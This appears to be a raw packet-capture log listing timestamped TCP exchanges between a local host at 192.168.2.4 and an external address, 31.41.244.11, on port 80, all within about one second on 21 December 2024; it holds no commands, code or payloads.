                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.714052916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.714101076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.714929104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.714977026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.715039968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.715086937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.715949059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.715997934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.716073990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.716120958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.716942072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.716989994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.717040062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.717099905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.717953920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.718059063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.718121052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.718168020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.719091892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.719139099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.719199896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.719249010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.719983101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.720031023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.720091105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.720136881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.721003056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.721052885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.721116066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.721163988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.722007990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.722054958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.722105026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.722151995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.723042011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.723093033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.723170042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.723217010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.724015951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.724066019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.724092007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.724140882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.725003004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.725054026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.725153923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.725198030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.725922108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.725976944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.726044893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.726094007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.726903915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.726948977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.726995945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.727044106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.727891922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.727942944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.728049994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.728101969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.728878975 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.728929043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.729006052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.729068041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.729943991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.729999065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.730065107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.730110884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.730894089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.730942965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.731111050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.731158018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.731913090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.731960058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.732022047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.732072115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.732913017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.732958078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.733021021 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.733068943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.733906984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.733980894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.734045029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.734087944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.734918118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.734966993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.735165119 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.735213041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.735904932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.735955000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.736033916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.736079931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.736941099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.736994028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.737171888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.737221956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.737941980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.737989902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.738121986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.738214016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.738915920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.738965988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.739042997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.739088058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.740003109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.740051985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.740166903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.740216970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.741058111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.741106987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.741209030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.741257906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.742067099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.742115974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.742166042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.742213964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.743082047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.743130922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.743347883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.743393898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.743918896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.743967056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.744085073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.744134903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.744898081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.744944096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.745026112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.745073080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.745938063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.745986938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.746077061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.746125937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.747003078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.747051001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.747116089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.747164011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.747937918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.747987032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.748023033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.748070955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.748903990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.748953104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.749018908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.749066114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.749958992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.750006914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.750150919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.750200033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.750943899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.750988007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.751065969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.751113892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.751948118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.751992941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.752070904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.752118111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.752919912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.752968073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.753042936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.753087997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.754029036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.754077911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.754133940 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.754184008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.755112886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.755158901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.755223036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.755270958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.756005049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.756051064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.756166935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.756211042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.757062912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.757106066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.757186890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.757230043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.758013964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.758060932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.758187056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.758232117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.759296894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.759402990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.759485960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.759535074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.899624109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.899694920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.899753094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.899791002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.899806023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.899832964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.900036097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.900098085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.900743008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.900804996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.900863886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.900912046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.901628017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.901674986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.901694059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.901734114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.902317047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.902374029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.902507067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.902546883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.903342009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.903403044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.903446913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.903501034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.904329062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.904375076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.904454947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.904506922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.905431032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.905489922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.905551910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.905597925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.906569004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.906622887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.906683922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.906733990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.907588005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.907633066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.907700062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.907752037 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.908580065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.908629894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.908727884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.908837080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.909742117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.909786940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.909867048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.909921885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.910499096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.910552979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.910631895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.910669088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.911398888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.911448002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.911531925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.911580086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.912292957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.912336111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.912431955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.912477016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.913300991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.913353920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.913439989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.913482904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.914298058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.914335966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.914422035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.914467096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.915218115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.915271997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.915411949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.915467024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.916254997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.916307926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.916439056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.916481972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.917310953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.917359114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.917457104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.917501926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.918284893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.918330908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.918373108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.918417931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.919238091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.919281960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.919461012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.919506073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.920257092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:12.920296907 CET4977080192.168.2.431.41.244.11
